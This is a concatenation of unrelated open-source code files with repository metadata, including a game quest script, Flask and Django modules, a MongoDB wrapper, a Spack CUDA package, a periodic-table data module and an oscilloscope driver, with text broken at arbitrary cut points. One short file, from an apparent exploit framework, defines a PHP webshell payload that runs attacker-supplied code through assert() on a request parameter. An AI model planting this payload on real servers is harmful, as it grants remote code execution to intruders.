st.set("cond","1")
st.setState(STARTED)
st.playSound("ItemSound.quest_accept")
elif event ==
|
"32486-05.htm" :
st.exitQuest(1)
st.playSound("ItemSound.quest_finish")
return htmlt
|
ext
def onTalk (self,npc,player):
htmltext = "<html><body>You are either not on a quest that involves this NPC, or you don't meet this NPC's minimum quest requirements.</body></html>"
st = player.getQuestState(qn)
if not st : return htmltext
npcId = npc.getNpcId()
id = st.getState()
EnergyOres = st.getQuestItemsCount(10866)
if id == CREATED :
if player.getLevel() < 18 :
htmltext = "32486-00.htm"
st.exitQuest(1)
else :
htmltext = "32486-01.htm"
elif EnergyOres > 0:
htmltext = "32486-07.htm"
bonus = 0
if EnergyOres >= 20:
bonus = 2044
st.giveItems(57,EnergyOres*50+bonus)
st.takeItems(10866,-1)
else :
htmltext = "32486-04.htm"
return htmltext
def onKill(self,npc,player,isPet):
st = player.getQuestState(qn)
if not st : return
if st.getState() != STARTED : return
if st.getRandom(10)<6 :
st.giveItems(10866,1)
st.playSound("ItemSound.quest_itemget")
return
QUEST = Quest(269,qn,"Invention Ambition")
CREATED = State('Start', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
QUEST.addStartNpc(32486)
QUEST.addTalkId(32486)
for mob in range(21124,21132) :
QUEST.addKillId(mob)
|
jiangzhw/Beebeeto-framework
|
utils/payload/webshell/php.py
|
Python
|
gpl-2.0
| 400 | 0.005 |
#author: fyth
from
|
webshell import *
class PhpShell(Webshell):
_password = 'cmd'
_content = "<?php var_dump(md5(123));@assert($_REQUEST['{0}']);?>"
_check_statement = 'var_dump(md5(123));'
_keyword = '202cb962ac59075b964b07152d234b70'
class PhpVerify(VerifyShell):
_content = "<?php var_dum
|
p(md5(123));unlink(__FILE__);?>"
_keyword = '202cb962ac59075b964b07152d234b70'
|
revarbat/epubber
|
epubber/views/main.py
|
Python
|
bsd-2-clause
| 2,968 | 0.003706 |
from __future__ import absolute_import
import re, os, sys
from clay import app
import clay.config
from flask import make_response, request, redirect, render_template, url_for
from epubber.fimfic_epubgen import FimFictionEPubGenerator
site_epub_classes = [
FimFictionEPubGenerator
]
accesslog = clay.config.get_logger('epubber_access')
#####################################################################
# Main App Views Section
#####################################################################
@app.route('/', methods=['GET', 'POST'])
def main_view():
story = request.args.get("story") or None
if story:
data = None
for epgenclass in site_epub_classes:
epgen = epgenclass()
if epgen.handle_url(story):
epub_file, data = epgen.gen_epub()
accesslog.info('%(title)s - %(url)s' % epgen.metas)
del epgen
response = make_response(data)
response.headers["Content-Type"] = "application/epub+zip"
response.headers["Content-Disposition"] = "attachment; filename=%s" % epub_file
return response
del epgen
return ("Cannot generate epub for this URL.", 400)
return render_template("main.html")
#####################################################################
# Secondary Views Section
#####################################################################
@app.route('/health', methods=['GET'])
def health_view():
'''
Heartbeat view, because why not?
'''
return ('OK', 200)
#####################################################################
# URL Shortener Views Section
#####################################################################
@app.route('/img/<path>', methods=['GET', 'POST'])
def static_img_proxy_view(path):
'''
Make shorter URLs for image files.
'''
path = re.sub(r'[^A-Za-z0-9_.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('img', path)))
@app.route('/js/<path>', methods=['GET', 'POST'])
def static_js_proxy_view(path):
'''
Make shorter URLs for javascript files.
'''
path = re.sub(r'[^A-Za-z0-9_+.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('js', path)))
@app.route('/css/<path>', methods=['GET', 'POST'])
def static_css_proxy_view(path):
'''
Ma
|
ke shorter URLs for CSS files.
'''
path = re.sub(r'[^
|
A-Za-z0-9_+.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('css', path)))
#####################################################################
# Main
#####################################################################
def main():
# Make templates copacetic with UTF8
reload(sys)
sys.setdefaultencoding('utf-8')
# App Config
app.secret_key = clay.config.get('flask.secret_key')
main()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 nowrap
|
PrayAndGrow/server
|
patrons/apps.py
|
Python
|
lgpl-3.0
| 89 | 0 |
from django.apps import AppConfig
class PatronsConf
|
ig(AppConfig)
|
:
name = 'patrons'
|
dotskapes/dotSkapes
|
models/003_data_manager.py
|
Python
|
mit
| 10,267 | 0.019382 |
import pymongo
from pymongo.objectid import ObjectId
import pymongo.cursor
class MongoWrapper:
def __init__ (self, cursor, model = None):
if model:
if not cursor['public']:
if not auth.user.id == cursor['owner']:
raise HTTP (401)
self.__dict__['cursor'] = cursor
self.__dict__['model'] = model
def __getattr__ (self, key):
try:
return getattr (self.cursor, key)
except AttributeError:
try:
val = self.cursor[unicode (key)]
if (type (val) == list) or (type (val) == dict):
return MongoWrapper (self.cursor[unicode (key)], self.model)
else:
return val
except KeyError:
return None
def __nonzero__ (self):
if self.cursor is None:
return False
return len (self.cursor) != 0
def __iter__ (self):
return MongoWrapperIter (self.cursor, self.model)
def public (self):
result = {}
result['id'] = str (self.cursor['_id'])
result['tags'] = self.cursor['tags']
for key in self.model.public ():
if self.cursor.has_key (key.name):
result[key.name] = self.cursor[key.name]
else:
result[key.name] = None
return result
def json (self):
return json.dumps (self.public ())
class MongoCursorWrapper:
def __init__ (self, cursor, model = None):
self.__cursor = cursor
self.model = model
def first (self):
if self.__cursor.count () > 0:
return self[0]
else:
return None
def __getattr__ (self, key):
return getattr (self.__cursor, key)
def __getitem__ (self, index):
record = self.__cursor[index]
if self.model:
if not record['public']:
if not auth.user.id == record['owner']:
raise HTTP (401)
return MongoWrapper (record, self.model)
def json (self):
result = []
for item in self:
result.append (item.public ())
return json.dumps (result)
def __len__ (self):
return self.__cursor.count ()
def __iter__ (self):
return MongoWrapperIter (self.__cursor, self.model)
class MongoWrapperIter:
def __init__ (self, cursor, model):
self.__cursor = iter (cursor)
self.model = model
def __iter__ (self):
return self
def next (self):
val = self.__cursor.next ()
if (type (val) == list) or (type (val) == dict):
return MongoWrapper (val, self.model)
else:
return val
class MongoCollectionWrapper:
def __init__ (self, name, model):
self.name = name
self.model = model
def authorized (self, record):
if not record['public']:
if not auth.user.id == record['owner']:
raise RuntimeError ()
def __getattr__ (self, key):
def action (*args, **kw):
data = getattr (mongo[self.name], key) (*args, **kw)
if type (data) == pymongo.cursor.Cursor:
return MongoCursorWrapper (data, self.model)
elif type (data) == dict:
return MongoWrapper (data, self.model)
else:
return data
return action
class DataManager:
def __init__ (self):
self.collections = {}
self.models = {}
def user (self):
user = mongo.users.find_one ({'user_id': auth.user.id})
if not user:
user = {'user_id': auth.user.id}
mongo.users.insert (user)
#print 'creating user'
return user
def define_datatype (self, datatype, model):
self.models[datatype] = model
self.collections[datatype] = MongoCollectionWrapper (datatype, model)
def insert (self, datatype, **kw):
kw['owner'] = auth.user.id
if not kw.has_key ('tags'):
kw['tags'] = []
if not kw.has_key ('public'):
kw['public'] = False
return self.collections[datatype].insert (kw)
def count (self, datatype):
return self.collections[datatype].count ()
def update (self, datatype, entry_id, **kw):
self.collections[datatype].update ({'_id': ObjectId (entry_id)}, {'$set': kw})
def global_load (self, datatype, kw = None):
if not kw:
data = self.collections[datatype].find ({
'public': True
})
else:
query = []
for kw_regex in kw:
query.append ({'name': {'$regex': kw_regex, '$options': 'i'}})
query.append ({'tags': {'$regex': kw_regex, '$options': 'i'}})
data = self.collections[datatype].find ({
'public': True,
|
'$or': query
})
return data
def local_load (self, datatype, keywords = None):
user = dm.user ()
if not user.has_key (datatype):
user[datatype]
|
= []
mongo.users.update ({'_id': user['_id']}, {'$set': {datatype: []}})
ids = user[datatype]
#data = mongo[datatype].find ({'_id': {'$in': ids}})
data = self.collections[datatype].find ({'_id': {'$in': map (lambda x: ObjectId (x), ids)}})
return data
def load_keyworded (self, datatype, kw):
return self.collections[datatype].find ({'tags': {'$in': kw}})
def get (self, datatype, object_id):
return self.collections[datatype].find_one ({'_id': ObjectId (object_id)})
def query (self, datatype, **query):
return self.collections[datatype].find (query)
def owner (self, datatype, object_id):
data = self.collections[datatype].find_one ({'_id': ObjectId (object_id)})
def public (self, datatype, object_id, pub_status):
self.collections[datatype].update ({'_id': ObjectId (object_id)}, {'$set': {'public': pub_status}})
def link (self, datatype, object_id):
dm.user ()
mongo.users.update ({'user_id': auth.user.id}, {'$push': {datatype: ObjectId (object_id)}})
#print dm.user ()
def unlink (self, datatype, object_id):
mongo.users.update ({'user_id': auth.user.id}, {'$pull': {datatype: ObjectId (object_id)}})
def delete (self, datatype, **kw):
self.collections[datatype].remove (kw)
def dup (self, datatype, alt_datatype):
self.models[alt_datatype] = self.models[datatype]
self.collections[alt_datatype] = self.collections[datatype]
def get_types (self):
return self.models
def tag (self, datatype, object_id, kw):
self.collections[datatype].update ({'_id': ObjectId (object_id)}, {'$pushAll': {'tags': kw}})
#def __ensure_user (self, user_id):
# if not mongo.users.find_one ({'user_id': user_id}):
# mongo.users.insert ({'user_id': user_id})
#def __ensure_type (self, user_id, datatype):
# if not mongo.users.find_one ({'user_id': user_id,
# datatype: {'$exists': true}
# }):
# mongo.users.update ({'user_id': user_id}, {datatype: []})
def boolean (val):
if isinstance (val, str):
lower = val.lower ()
if lower == 'false':
return False
elif lower == 'f':
return False
elif lower == 'true':
return True
elif lower == 't':
return True
elif isinstance (val, int):
if val == 0:
return False
elif val == 1:
return True
elif isinstance (val, float):
if val == 0.0:
return False
elif val == 1.0:
return True
else:
if val is None:
return False
raise RuntimeError ('Cast to boolean failed: Could not convert ' +
str (val) + ' to a boolean')
def cond_assign (dst, src, key):
if src.has_key (key):
dst[key] = src[key]
class attr_dict (d
|
tmerrick1/spack
|
var/spack/repos/builtin/packages/cuda/package.py
|
Python
|
lgpl-2.1
| 3,901 | 0.001794 |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
from glob import glob
class Cuda(Package):
"""CUDA is a parallel computing platform and programming model invented
by NVIDIA. It enables dramatic increases in computing performance by
harnessing the power of the graphics processing unit (GPU).
Note: This package does not currently install the drivers necessary
to run CUDA. These will need to be installed manually. See:
https://docs.nvidia.com/cuda/ for details."""
homepage = "https://developer.nvidia.com/cuda-zone"
version('9.2.88',
|
'dd6e33e10d32a29914b7700c7b3d1ca0', expand=False,
url="https://
|
developer.nvidia.com/compute/cuda/9.2/Prod/local_installers/cuda_9.2.88_396.26_linux")
version('9.1.85', '67a5c3933109507df6b68f80650b4b4a', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.1/Prod/local_installers/cuda_9.1.85_387.26_linux")
version('9.0.176', '7a00187b2ce5c5e350e68882f42dd507', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run")
version('8.0.61', '33e1bd980e91af4e55f3ef835c103f9b', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/Prod2/local_installers/cuda_8.0.61_375.26_linux-run")
version('8.0.44', '6dca912f9b7e2b7569b0074a41713640', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/prod/local_installers/cuda_8.0.44_linux-run")
version('7.5.18', '4b3bcecf0dfc35928a0898793cf3e4c6', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/7.5/Prod/local_installers/cuda_7.5.18_linux.run")
version('6.5.14', '90b1b8f77313600cc294d9271741f4da', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/6_5/rel/installers/cuda_6.5.14_linux_64.run")
def install(self, spec, prefix):
runfile = glob(join_path(self.stage.path, 'cuda*_linux*'))[0]
chmod = which('chmod')
chmod('+x', runfile)
runfile = which(runfile)
# Note: NVIDIA does not officially support many newer versions of
# compilers. For example, on CentOS 6, you must use GCC 4.4.7 or
# older. See:
# http://docs.nvidia.com/cuda/cuda-installation-guide-linux/#system-requirements
# https://gist.github.com/ax3l/9489132
# for details.
runfile(
'--silent', # disable interactive prompts
'--verbose', # create verbose log file
'--override', # override compiler version checks
'--toolkit', # install CUDA Toolkit
'--toolkitpath=%s' % prefix
)
|
thomec/tango
|
accounts/authentication.py
|
Python
|
gpl-2.0
| 1,296 | 0.003086 |
# accounts/authentication.py
import requests
import logging
from django.conf import settings
from django.contrib.auth import get_user_model
logger = logging.getLogger(__name__)
User = get_user_model()
PERSONA_VERIFY_URL = 'https://verifier.login.persona.org/verify'
#DOMAIN = 'localhost'
#DOMAIN = 'http://hotzenplotz.pythonanywhere.com'
class PersonaAuthenticationBackend(object):
def authenticate(self, assertion):
logging.warning('entering authenticate function')
response = requests.post(
PERSONA_VERIFY_URL,
data = {'assertion': assertion, 'audience': settings.DOMAIN}
)
logging.warning('got response from persona')
logging.warning(response.content.decode())
if response.ok and response.json()['status'] == 'okay':
email = respon
|
se.json()['email']
try:
return User.objects.get(email=email)
except User.DoesNotExist:
|
return User.objects.create(email=email)
else:
logger.warning(
'Persona says no. Json was: {}'.format(response.json())
)
def get_user(self, email):
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return None
|
jmmauricio/pypstools
|
dev/colormaps.py
|
Python
|
gpl-3.0
| 214 | 0.037383 |
import nump
|
y as np
import matplotlib.pyplot as plt
x = np.arange(4)
y = x
t = [1.
|
0,0.9,0.95,1.05]
s = np.array([1.0,0.9,0.95,1.05])*100
plt.scatter(x, y, c=t, s=s, alpha = 0.5)
plt.colorbar()
plt.show()
|
amyth/django-instapush
|
instapush/models/base.py
|
Python
|
mit
| 2,928 | 0.006489 |
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from .fields import HexIntegerField
from .managers import APNSDeviceManager, GCMDeviceManager
try:
instapush_settings = settings.INSTAPUSH_SETTINGS
except AttributeError:
raise ImproperlyConfigured("Please include instapush settings dictionary "\
"in your django settings")
class BaseDevice(models.Model):
"""
Represents a base device object. This class defines
the generic fields to be used by all device types.
All other device types should inherit from this.
"""
name = models.CharField(_('name'), max_length=255, blank=True, null=True)
active = models.BooleanField(_('active'), default=True)
## as a device can not only be related to a user
## but any other defined models. we let the push
## user decide which model should be the owner
## of a device object. For cases, where a device
## does not have to be related to any model this
## can be left empty and hence blank and null are
## set to True
owner = models.ForeignKey(instapush_settings.get('DEVICE_OWNER_MODEL'),
blank=True, null=True)
created = models.DateTimeField(_('created'), auto_now_add=True)
updated = models.DateTimeField(_('updated'), auto_now=True)
class Meta:
abstract = True
def __unicode__(self):
return self.name or self.device_id or self.registration_id
class GCMDevice(BaseDevice):
"""
Represents an android device
"""
device_id = HexIntegerField(_('Device ID'), blank=True, null=True,
db_index=True)
registration_id = models.TextField(_('Registration ID'))
## Set custom manager
objects = GCMDeviceManager()
class Meta:
verbose_name = _('GCM Device')
verbose_name_plural = _('GCM Devices')
def send_messa
|
ge(self, message, **kwargs):
"""
Sends a push notification to this device
|
via GCM
"""
from ..libs.gcm import gcm_send_message
data = kwargs.pop("extra", {})
if message is not None:
data["message"] = message
return gcm_send_message(registration_id=self.registration_id,
data=data, **kwargs)
class APNSDevice(BaseDevice):
"""
Represents an iOS device
"""
device_id = models.UUIField(_('Device ID'), blank=True, null=True,
db_index=True)
registration_id = models.CharField(_('Registration ID'), max_length=64,
unique=True)
## Set custom manager
APNSDeviceManager()
class Meta:
verbose_name = _('APNS Device')
verbose_name_plural = _('APNS Devices')
def send_message(self, message, **kwargs):
from ..libs.apns import apns_send_message
return apns_send_message(registration_id=self.registration_id,
alert=message, **kwargs)
|
kratman/psi4public
|
psi4/driver/qcdb/periodictable.py
|
Python
|
gpl-2.0
| 78,237 | 0.013434 |
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""Elemental masses (most common isotope), symbols, and atomic numbers from psi4.
"""
_temp_element = ["GHOST", "HYDROGEN", "HELIUM", "LITHIUM", "BERYLLIUM",
"BORON", "CARBON", "NITROGEN", "OXYGEN", "FLUORINE",
"NEON", "SODIUM", "MAGNESIUM", "ALUMINUM", "SILICON",
"PHOSPHORUS", "SULFUR", "CHLORINE", "ARGON", "POTASSIUM",
"CALCIUM", "SCANDIUM", "TITANIUM", "VANADIUM", "CHROMIUM",
"MANGANESE", "IRON", "COBALT", "NICKEL", "COPPER",
"ZINC", "GALLIUM", "GERMANIUM", "ARSENIC", "SELENIUM",
"BROMINE", "KRYPTON", "RUBIDIUM", "STRONTIUM", "YTTRIUM",
"ZIRCONIUM", "NIOBIUM", "MOLYBDENUM", "TECHNETIUM", "RUTHENIUM",
"RHODIUM", "PALLADIUM", "SILVER", "CADMIUM", "INDIUM",
"TIN", "ANTIMONY", "TELLURIUM", "IODINE", "XENON",
"CESIUM", "BARIUM", "LANTHANUM", "CERIUM", "PRASEODYMIUM",
"NEODYMIUM", "PROMETHIUM", "SAMARIUM", "EUROPIUM", "GADOLINIUM",
"TERBIUM", "DYSPROSIUM", "HOLMIUM", "ERBIUM", "THULIUM",
"YTTERBIUM", "LUTETIUM", "HAFNIUM", "TANTALUM", "TUNGSTEN",
"RHENIUM", "OSMIUM", "IRIDIUM", "PLATINUM", "GOLD",
"MERCURY", "THALLIUM", "LEAD", "BISMUTH", "POLONIUM",
"ASTATINE", "RADON", "FRANCIUM", "RADIUM", "ACTINIUM",
"THORIUM", "PROTACTINIUM", "URANIUM", "NEPTUNIUM", "PLUTONIUM",
"AMERICIUM", "CURIUM", "BERKELIUM", "CALIFORNIUM", "EINSTEINIUM",
"FERMIUM", "MENDELEVIUM", "NOBELIUM", "LAWRENCIUM" "RUTHERFORDIUM",
"DUBNIUM", "SEABORGIUM", "BOHRIUM"]
_temp_symbol = ["X", "H", "HE", "LI", "BE", "B", "C", "N", "O", "F", "NE", "NA", "MG",
"AL", "SI", "P", "S", "CL", "AR", "K", "CA", "SC", "TI", "V", "CR", "MN", "FE", "CO",
"NI", "CU", "ZN", "GA", "GE", "AS", "SE", "BR", "KR", "RB", "SR", "Y", "ZR", "NB",
"MO", "TC", "RU", "RH", "PD", "AG", "CD", "IN", "SN", "SB", "TE", "I", "XE", "CS",
"BA", "LA", "CE", "PR", "ND", "PM", "SM", "EU", "GD", "TB", "DY", "HO", "ER", "TM",
"YB", "LU", "HF", "TA", "W", "RE", "OS", "IR", "PT", "AU", "HG", "TL", "PB", "BI",
"PO", "AT", "RN", "FR", "RA", "AC", "TH", "PA", "U", "NP", "PU", "AM", "CM", "BK",
"CF", "ES", "FM", "MD", "NO", "LR", "RF", "DB", "SG", "BH", "HS", "MT", "DS", "RG",
"UUB", "UUT", "UUQ", "UUP", "UUH", "UUS", "UUO"]
_temp_z = list(range(0, 108))
_temp_mass = [
0., 1.00782503207, 4.00260325415, 7.016004548, 9.012182201, 11.009305406,
12, 14.00307400478, 15.99491461956, 18.998403224, 19.99244017542,
22.98976928087, 23.985041699, 26.981538627, 27.97692653246, 30.973761629,
31.972070999, 34.968852682, 39.96238312251, 38.963706679, 39.962590983,
44.955911909, 47.947946281, 50.943959507, 51.940507472, 54.938045141,
55.934937475, 58.933195048, 57.935342907, 62.929597474, 63.929142222,
68.925573587, 73.921177767, 74.921596478, 79.916521271, 78.918337087,
85.910610729, 84.911789737, 87.905612124, 88.905848295, 89.904704416,
92.906378058, 97.905408169, 98.906254747, 101.904349312, 102.905504292,
105.903485715, 106.90509682, 113.90335854, 114.903878484, 119.902194676,
120.903815686, 129.906224399, 126.904472681, 131.904153457, 132.905451932,
137.905247237, 138.906353267, 139.905438706, 140.907652769, 141.907723297,
144.912749023, 151.919732425, 152.921230339, 157.924103912, 158.925346757,
163.929174751, 164.93032207, 165.930293061, 168.93421325, 173.938862089,
174.940771819, 179.946549953, 180.947995763, 183.950931188, 186.955753109,
191.96148069, 192.96292643, 194.964791134, 196.966568662, 201.970643011,
204.974427541, 207.976652071, 208.980398734, 208.982430435, 210.987496271,
222.017577738, 222.01755173, 228.031070292, 227.027752127, 232.038055325,
231.03588399, 238.050788247, 237.048173444, 242.058742611, 243.06138108,
247.07035354, 247.07030708, 251.079586788, 252.082978512, 257.095104724,
258.098431319, 255.093241131, 260.105504, 263.112547, 255.107398, 259.114500,
262.122892, 263.128558, 265.136151, 281.162061, 272.153615, 283.171792, 283.176451,
285.183698, 287.191
|
186, 292.199786, 291.206564, 293.214670]
_temp_iso_sy
|
mbol = [
"H", "H1", "H2", "D", "H3", "T", "H4", "H5", "H6", "H7", "HE", "HE3", "HE4",
"HE5", "HE6", "HE7", "HE8", "HE9", "HE10", "LI", "LI3", "LI4", "LI5", "LI6",
"LI7", "LI8", "LI9", "LI10", "LI11", "LI12", "BE", "BE5", "BE6", "BE7", "BE8",
"BE9", "BE10", "BE11", "BE12", "BE13", "BE14", "BE15", "BE16", "B", "B6", "B7",
"B8", "B9", "B10", "B11", "B12", "B13", "B14", "B15", "B16", "B17", "B18", "B19",
"C", "C8", "C9", "C10", "C11", "C12", "C13", "C14", "C15", "C16", "C17", "C18",
"C19", "C20", "C21", "C22", "N", "N10", "N11", "N12", "N13", "N14", "N15", "N16",
"N17", "N18", "N19", "N20", "N21", "N22", "N23", "N24", "N25", "O", "O12", "O13",
"O14", "O15", "O16", "O17", "O18", "O19", "O20", "O21", "O22", "O23", "O24",
"O25", "O26", "O27", "O28", "F", "F14", "F15", "F16", "F17", "F18", "F19", "F20",
"F21", "F22", "F23", "F24", "F25", "F26", "F27", "F28", "F29", "F30", "F31",
"NE", "NE16", "NE17", "NE18", "NE19", "NE20", "NE21", "NE22", "NE23", "NE24",
"NE25", "NE26", "NE27", "NE28", "NE29", "NE30", "NE31", "NE32", "NE33", "NE34",
"NA", "NA18", "NA19", "NA20", "NA21", "NA22", "NA23", "NA24", "NA25", "NA26",
"NA27", "NA28", "NA29", "NA30", "NA31", "NA32", "NA33", "NA34", "NA35", "NA36",
"NA37", "MG", "MG19", "MG20", "MG21", "MG22", "MG23", "MG24", "MG25", "MG26",
"MG27", "MG28", "MG29", "MG30", "MG31", "MG32", "MG33", "MG34", "MG35", "MG36",
"MG37", "MG38", "MG39", "MG40", "AL", "AL21", "AL22", "AL23", "AL24", "AL25",
"AL26", "AL27", "AL28", "AL29", "AL30", "AL31", "AL32", "AL33", "AL34", "AL35",
"AL36", "AL37", "AL38", "AL39", "AL40", "AL41", "AL42", "SI", "SI22", "SI23",
"SI24", "SI25", "SI26", "SI27", "SI28", "SI29", "SI30", "SI31", "SI32", "SI33",
"SI34", "SI35", "SI36", "SI37", "SI38", "SI39", "SI40", "SI41", "SI42", "SI43",
"SI44", "P", "P24", "P25", "P26", "P27", "P28", "P29", "P30", "P31", "P32",
"P33", "P34", "P35", "P36", "P37", "P38", "P39", "P40", "P41", "P42", "P43",
"P44", "P45", "P46", "S", "S26", "S27", "S28", "S29", "S30", "S31", "S32", "S33",
"S34", "S35", "S36", "S37", "S38", "S39", "S40", "S41", "S42", "S43", "S44",
"S45", "S46", "S47", "S48", "S49", "CL", "CL28", "CL29", "CL30", "CL31", "CL32",
"CL33", "CL34", "CL35", "CL36", "CL37", "CL38", "CL39", "CL40", "CL41", "CL42",
"CL43", "CL44", "CL45", "CL46", "CL47", "CL48", "CL49", "CL50", "CL51", "AR",
"AR30", "AR31", "AR32", "AR33", "AR34", "AR35", "AR36", "AR37", "AR38", "AR39",
"AR40", "AR41", "AR42", "AR43", "AR44", "AR45", "AR46", "AR47", "AR48", "AR49",
"AR50", "AR51", "AR52", "AR53", "K", "K32", "K33", "K34", "K35", "K36", "K37",
"K38", "K39", "K40", "K41", "K42", "K43", "K44", "K45", "K46", "K47", "K48",
"K49", "K50", "K51", "K52", "K53", "K54", "K55", "CA", "CA34", "CA35", "CA36",
"CA37", "CA38", "CA39", "CA40", "CA41", "CA42", "CA43", "CA44", "CA45", "CA46",
"CA47", "CA48", "CA49", "CA50", "CA51", "CA52", "CA53", "CA54", "CA55", "CA56",
"CA57", "SC", "SC36", "SC37", "SC38", "SC39", "SC40", "SC41", "SC42", "SC43",
"SC44", "SC45", "SC46", "SC47", "SC48", "SC49", "SC50", "SC51", "SC52", "SC53",
"SC54", "SC55", "SC56", "SC57", "SC58", "SC59", "SC60", "TI", "TI38", "TI39",
"TI40", "TI41", "TI42", "TI43", "TI44", "TI45", "TI46", "TI47", "TI48", "TI49",
"TI50", "TI51", "TI52", "TI53",
|
KatjaT/Thermodynamics
|
katja_thermo.py
|
Python
|
mit
| 3,325 | 0.010827 |
# -*
|
- coding: utf-8 -*-
"""
calculate thermodynamics for Katja
"""
from component_contribution.kegg_reaction import KeggReaction
from component_contribution.kegg_model import KeggModel
from component_contribution.component_contribution import ComponentContribution
from component_contribution.thermodynamic_constants import R, default_T
import csv
import numpy as np
import uncertainties.unumpy as unumpy
def reaction2dG0(reaction_list):
'''
Calculates the
|
dG0 of a list of a reaction.
Uses the component-contribution package (Noor et al) to estimate
the standard Gibbs Free Energy of reactions based on
component contribution approach and measured values (NIST and Alberty)
Arguments:
List of reaction strings
Returns:
Array of dG0 values and standard deviation of estimates
'''
cc = ComponentContribution.init()
Kmodel = KeggModel.from_formulas(reaction_list)
Kmodel.add_thermo(cc)
dG0_prime, dG0_std = Kmodel.get_transformed_dG0(pH=7.5, I=0.2, T=298.15)
dG0_prime = np.array(map(lambda x: x[0,0], dG0_prime))
dG0_prime = unumpy.uarray(dG0_prime, np.diag(dG0_std))
return dG0_prime
def reaction2Keq(reaction_list):
'''
Calculates the equilibrium constants of a reaction, using dG0.
Arguments:
List of cobra model reaction objects
Returns:
Array of K-equilibrium values
'''
dG0_prime = reaction2dG0(reaction_list)
Keq = unumpy.exp( -dG0_prime / (R*default_T) )
return Keq
def reaction2RI(reaction_list, fixed_conc=0.1):
'''
Calculates the reversibility index (RI) of a reaction.
The RI represent the change in concentrations of metabolites
(from equal reaction reactants) that will make the reaction reversible.
That is, the higher RI is, the more irreversible the reaction.
A convenient threshold for reversibility is RI>=1000, that is a change of
1000% in metabolite concentrations is required in order to flip the
reaction direction.
Arguments:
List of cobra model reaction objects
Returns:
Array of RI values
'''
keq = reaction2Keq(reaction_list)
sparse = map(lambda x: KeggReaction.parse_formula(x).sparse, reaction_list)
N_P = np.zeros(len(sparse))
N_S = np.zeros(len(sparse))
for i,s in enumerate(sparse):
N_P[i] = sum([v for v in s.itervalues() if v>0])
N_S[i] = -sum([v for v in s.itervalues() if v<0])
N = N_P + N_S
Q_2prime = fixed_conc**(N_P-N_S)
RI = ( keq*Q_2prime )**( 2.0/N )
return RI
if __name__ == "__main__":
reactions = csv.reader(open('CCMtbRxnsKEGG.txt', 'r'))
names = []
reaction_list = []
for row in reactions:
row = row[0].split(" ")
names.append(row[0].replace("'", ''))
reaction_list.append(row[1])
dG0 = reaction2dG0(reaction_list)
Keq = reaction2Keq(reaction_list)
RI = reaction2RI(reaction_list)
reversibility_index = dict(zip(names, RI))
f = open('reversibility_index.csv','w')
w = csv.writer(f)
for k,v in reversibility_index.iteritems():
w.writerow([k, v])
f.close()
|
alexforencich/python-ivi
|
ivi/agilent/agilentMSOX92804A.py
|
Python
|
mit
| 1,692 | 0.004728 |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2017 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Softwa
|
re"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subjec
|
t to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent90000 import *
class agilentMSOX92804A(agilent90000):
"Agilent Infiniium MSOX92804A IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'MSOX92804A')
super(agilentMSOX92804A, self).__init__(*args, **kwargs)
self._analog_channel_count = 4
self._digital_channel_count = 16
self._channel_count = self._analog_channel_count + self._digital_channel_count
self._bandwidth = 28e9
self._init_channels()
|
